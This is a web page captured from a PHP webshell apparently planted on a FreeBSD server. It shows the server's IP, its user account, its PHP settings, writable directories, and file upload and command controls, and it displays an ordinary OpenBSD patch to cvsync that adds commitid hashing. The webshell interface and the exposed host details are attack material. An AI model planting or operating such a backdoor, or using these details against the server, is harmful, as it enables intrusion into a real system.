403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/net/cvsync/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/net/cvsync/files/patch-common_filescan_rcs_c
$OpenBSD: patch-common_filescan_rcs_c,v 1.2 2014/06/25 17:54:07 naddy Exp $
--- common/filescan_rcs.c.orig	Mon Jul 18 16:32:57 2005
+++ common/filescan_rcs.c	Wed Jun 25 16:01:04 2014
@@ -931,6 +931,13 @@ filescan_rcs_update_rcs_delta(struct filescan_args *fs
 					   rev->next.n_len);
 		}
 
+		/* commitid */
+		if (fsa->fsa_proto >= CVSYNC_PROTO(0, 25)) {
+			if (rev->commitid.i_len > 0)
+				(*hashops->update)(fsa->fsa_hash_ctx, rev->commitid.i_id,
+				    rev->commitid.i_len);
+		}
+
 		(*hashops->final)(fsa->fsa_hash_ctx, cmd);
 
 		if (!mux_send(fsa->fsa_mux, MUX_FILECMP, cmd, hashops->length))

Youez - 2016 - github.com/yon3zu
LinuXploit